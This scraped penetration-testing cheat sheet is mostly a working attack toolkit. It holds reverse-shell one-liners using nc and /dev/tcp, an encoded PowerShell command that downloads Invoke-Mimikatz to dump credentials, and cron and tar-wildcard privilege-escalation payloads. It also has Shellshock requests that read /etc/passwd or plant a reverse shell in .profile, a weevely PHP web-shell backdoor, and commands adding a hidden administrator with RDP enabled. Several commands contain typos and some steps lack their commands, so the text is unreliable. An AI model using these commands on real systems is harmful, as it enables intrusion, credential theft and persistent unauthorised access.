Reverse Shell Tricks
Spawning a TTY Shell
Copy python -c 'import pty; pty.spawn("/bin/sh")'
Copy echo os.system ( '/bin/bash' )
Copy perl —e 'exec "/bin/sh";'
Copy perl: exec "/bin/sh" ;
Copy lua: os.execute ( '/bin/sh' ) From within IRB
From within vi
From within vi
Copy :set shell=/bin/bash:shell From within nmap
Double characters
Getting double characters (which is annoying)? You can clean that up with:
Shell upgrade
How to get a fully functional shell:
Get a tty shell, e.g.,:
Copy python -c "import pty;pty.spawn('/bin/bash')"
Upgrade shell to a tty:
Copy SHELL = /bin/bash script -q /dev/null
Set terminal:
Copy export TERM = xterm-256color
Switch to the background with CTRL+Z.
Change to the foreground with
Reset the tty with
No we have a fully functional shell. CTRL+C terminates the remote process, not the local nc, anymore.
PowerShell Tricks
Invoke-Mimikatz
Copy cmd /c "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzADsA" The decoded base64 is:
Copy IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; Ubuntu disable firewall
Cron job
Depending on how your linux system is set up, you can look in:
Copy /var/spool/cron/* (user crontabs )
/etc/crontab (system-wide crontab ) also, many distros have:
Copy /etc/cron.d/* These configurations have the same syntax as /etc/crontab
/etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly These are simply directories that contain executables that are executed hourly, daily, weekly or monthly, per their directory name. On top of that, you can have at jobs (check /var/spool/at/), anacron (/etc/anacrontab and /var/spool/anacron/ )
Copy cat /etc/crontab
cat /etc/cron.daily/backup
Copy echo "mkfifo /tmp/she; nc 127.0.0.1 9999 0</tmp/she | /bin/sh > /tml/she 2>&1; tm /tmp/she" > shell.sh && chmod +x shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
Cron file
Append
Copy echo 'rm -rf /tmp/p; mknod /tmp/p p; /bin/bash 0</tmp/p | nc 192.168.30.128 1234 >/tmp/p' >> /tab/script.sh Search for interesting files
Copy find / -name ".*" -type f -path "/home/*" -exec ls -al {} \; 2> /dev/null
Copy find -name ".bash_history" -path "/home/*" -exec cat {} \;
Copy find / -user USERtoUSE 2> /dev/null Look for files owned by root that we could write to. To reduce false positives, only look for files (not symlinks) and exclude proc, which is full of root-owned writable files.
Copy find / -user root -perm -002 -type f -not -path "/proc/*" 2> /dev/null SUID
Copy find / -perm -4000 -type f -exec ls -la {} 2> /dev/null \;
Copy find / -type f -perm -/o+w 2> /dev/null | grep -Ev '(proc|sys|www)' weevely
Copy weevely generate mysecret ~/Desktop/mydoor.php
Copy weevely http://192.168.56.101/imfadministrator/uploads/mydoor.php mahsecret ls
weevely http://192.168.56.101/imfadministrator/uploads/mydoor.php mahsecret Port knocking with nc
Copy nc -z 192.168.110.101 7000 8000 9000 ; Shellshock
Copy ssh -i noob noob@192.168.40.132 '() { :;}; /bin/bash'
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/id" http://sokar:591/cgi-bin/cat ; cat cat
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://172.16.66.137:591/cgi-bin/cat
egress filter
User-Agent: () { : ;}; echo ; /bin/echo '/bin/bash -i >& /dev/tcp/192.168.221.139/51242 0>&1 ' > /home/bynarr/.profile ; Quick add Admin and RDP
Copy net user /add caiom MySecurePassword158!
Copy net localgroup administrators caiom /add To start up the Remote Desktop (RDP) service.
Copy reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 Configure the firewall to let RDP connections in.
Copy netsh firewall set service remoteadmin enable
Copy netsh firewall set service remotedesktop enable Now use rdesktop on Kali to log in to your newly minted account.
Nmap list all scripts
Copy ls -l /usr/share/nmap/scripts/smb* Forward traffic from a laptop's wlan0 to eth0
PC
Specify an IP address to eth0 (here 192.168.56.1)
Copy ifconfig eth0 192.168.56.1 netmask 255.255.255.0 Enable IP forwarding
Copy sysctl -w net.ipv4.ip_forward= 1 Forward packets from eth0 to wlan0
Copy iptables -A FORWARD --in-interface eth0 -j ACCEPT
Copy iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE Device connected to PC
Setup IP address for eth0,and add gateway
Copy ifconfig eth0 192.168.56.2 netmask 255.255.255.0
Copy route add default gw 192.168.56.1 Kudos, References and Further Reading